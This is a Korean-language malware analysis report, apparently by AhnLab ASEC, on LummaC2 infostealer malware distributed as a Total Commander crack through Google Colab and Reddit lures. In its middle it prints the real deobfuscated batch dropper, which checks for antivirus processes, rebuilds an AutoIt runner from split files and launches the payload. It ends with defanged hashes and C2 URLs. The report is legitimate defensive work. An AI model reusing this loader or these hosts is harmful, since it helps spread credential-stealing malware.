Total Commander Crack 으로 위장하여 유포되는 LummaC2 악성코드

Ahnlab SEcurity intellegence Center(ASEC)은 Total Commander라는 툴로 위장하여 유포되는 LummaC2 악성코드를 발견했다. TotalCommander는 Windows용 파일 관리자(File Manager)로, 다양한 파일 포맷을 지원하며 복사(Copy)및 이동(Move)기능과 파일 내부 문자열을 활용한 고급 검색 기능, 폴더 동기화, FTP/SFTP 기능 등 전반적인 파일 관리를 편리하게 해주는 툴이다. 해당 툴은 한 달간 무료 사용 이후, 정식 버전(유료) 라이센스를 구매해야 한다.

 

[그림 1] Total Commander

 

Google에 “Total Commander Crack”이라고 검색하면 노출되는 크랙 버전 다운로드 관련 글이 보인다. 해당 게시물을 클릭하면 Google Colab 드라이브로 연결되며, 다운로드 버튼을 누르도록 유도하고 있다. 이후 [그림 2]부터 [그림 5]의 흐름과 같이 여러 번의 페이지 이동을 거쳐 최종적으로 공격자가 파일을 업로드 해놓은 곳으로 이동하게 된다. 이러한 페이지 이동은 자동으로 리다이렉션 되는 것이 아닌, 사용자가 Crack으로 위장한 악성코드를 다운로드 하기 위해 게시물을 읽어가며 링크를 클릭해야 했다. 즉, 실제로 해당 Crack 소프트웨어를 다운로드 하려는 사람들을 목적으로 공격이 진행되었음을 의미한다. 특히, 해외 유명 커뮤니티(Reddit)에서 Total Commander 크랙 버전 요청에 대한 게시물과 이에 대한 답변으로 댓글에 하이퍼링크를 첨부하는 등의 치밀함이 보인다.

 

[그림 2] Google에 “Total Commander Crack” 검색

 

[그림 3] 다운로드 페이지 1 – Google Colab 드라이브

 

[그림 4] 다운로드 페이지 2 – Reddit 게시물 위장

 

[그림 5] 다운로드 페이지 3 – 최종 다운로드 페이지

 

해당 링크를 통해 다운로드 한 ZIP 파일은 내부에 다시 RAR 파일이 존재하는 이중압축 구조로 되어있으며, 암호가 걸려있다.

[그림 6] 다운로드 되는 압축 파일과 내부 파일

 

최종적으로 “installer_1.05_38.2.exe”파일을 실행하여 설치를 유도하며, 파일 실행 시 LummaC2 악성코드에 감염된다. 해당 악성코드는 LummaC2 악성코드를 NSIS 스크립트와 AutoIt 스크립트로 여러번 감싼 형태를 띄고 있다. 실행 시 최초 동작하는 것은 NSIS 스크립트이다. NSIS 스크립트의 ExecShell 커맨드를 활용하여 cmd로 Batch 스크립트를 실행하고 있다. 아래 [그림 7]에서 하이라이팅한 부분은 변수를 문자열 중간에 삽입하는 방식을 취하고 있으며 실행 시점에 변수에 존재하는 값을 대입하면 아래와 같은 명령이 실행된다.

ExecShell open cmd “/c copy Nv Nv.cmd & Nv.cmd

[그림 7] NSIS 스크립트

 

Batch 스크립트는 아래와 같이 난독화 되어있다. 문자를 변수에 저장하고, 해당 변수를 명령어 중간에 삽입하는 방식으로 구성되어 있으며, 명령어 중간에 의미없는 문자열이 추가되어 있어 해석하기 어렵게 만든다.

[그림 8] Nv.cmd (Batch 스크립트)

 

난독화가 해제된 스크립트는 아래와 같으며, 비교적 짧은 것을 알 수 있다. 

Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=Olympic.com
Set RRddJNCtGgRY= 
Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=5
tasklist | findstr /I "opssvc wrsa" & if not errorlevel 1 ping -n 194 127.0.0.1
Set /a Fires=363926
tasklist | findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" & if not errorlevel 1 Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=AutoIt3.exe & Set RRddJNCtGgRY=.a3x & Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=300
cmd /c md Fires
extrac32 /Y /E Schools
<nul set /p ="MZ" > Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
findstr /V "LIL" Cir >> Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
cmd /c copy /b Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT + Religion + Consisting + Stuart + Police + Turns + Constitutes + Knives + Momentum + Stuff + Keywords + Infections Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT
cd Fires
cmd /c copy /b ..\Hebrew + ..\Fla + ..\Mtv + ..\Novel + ..\Suffer + ..\Update + ..\Msn NRRddJNCtGgRY
start VOqMytMZEmITmzXaSwyTLVZwsCxvDeT NRRddJNCtGgRY
cd ..
choice /d y /t FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz

 

분석 결과 정상 AutoIt 실행파일(Runner)와 컴파일된 Autoit(.a3x) 스크립트가 실행된다. NSIS에 의해 최초 실행되는 cmd 파일만 단일파일이며, 이후 .a3x 스크립트와 해당 스크립트를 실행시켜주는 Runner 역할의 AutoIt 실행파일은 여러 개의 파일로 나뉘어져 있다. 각 파일이 어떻게 나뉘어 있는지는 아래 [그림 9]를 참고하면 된다. 

[그림 9] 나뉘어있는 바이너리 파일

 

최종적으로 실행되는 LummaC2 악성코드는 아래 [그림 10]과 같이 .a3x 파일 내부에 암호화 되어있으며 실행 시점에 복호화 되어 메모리에 로드된다. 암호화된 악성코드 바이너리와 이를 압축 해제 및 로드하는 ShellCode가 모두 AutoIt 스크립트 내부에 포함되는 형태를 띄고 있다. 이와 같이 악성코드를 AutoIt 스크립트로 감싸서 유포하는 방법은 최근 공격자들이 많이 사용하는 방법으로, 해당 기법에 대한 자세한 분석 정보는 이전 게시물 [1] [2] 에서 확인할 수 있다.

[그림 10] .a3x 파일을 디컴파일 한 스크립트

LummaC2 악성코드는 정보탈취 유형의 악성코드로, 2023년 초부터 본격적으로 유포되기 시작하였으며 주로 크랙, 시리얼 등의 불법 프로그램을 위장하여 유포된다. LummaC2 악성코드에 감염될 경우 브라우저 저장 계정 정보, 메일 정보, 암호화폐 지갑 정보, 자동 로그인 프로그램 정보 등의 민감 정보가 공격자의 C&C 서버로 전송되며, 탈취된 정보는 다크웹에서 거래되거나 추가 공격에 활용되는 등 2차 피해가 발생할 수 있다. 개인 PC에서 탈취된 정보로 인해 기업 시스템까지 공격을 당하는 침해 사고도 꾸준히 발생하고 있다. LummaC2 악성코드에 대한 분석 정보는 이전 게시물 [3] [4] [5] [6] [7]을 통해 확인할 수 있다.

 

이처럼, 소프트웨어를 다운로드 할 때에는 공식 배포 사이트에서 다운로드 하는 것이 좋으며 출처가 불분명한 소프트웨어 이용 시 각별한 주의가 필요하다.

MD5

0a2d4bbb5237add913a2c6cf24c08688

0da35eeccb9746a77d6b20dfdd01e1e1

12087e91e60f195b2bc69b819978690e

1f13356efe44af196602fc3438889d16

25728e657a3386c5bed9ae133613d660

URL

http[:]//affordtempyo[.]biz/

http[:]//hoursuhouy[.]biz/

http[:]//impolitewearr[.]biz/

http[:]//lightdeerysua[.]biz/

http[:]//mixedrecipew[.]biz/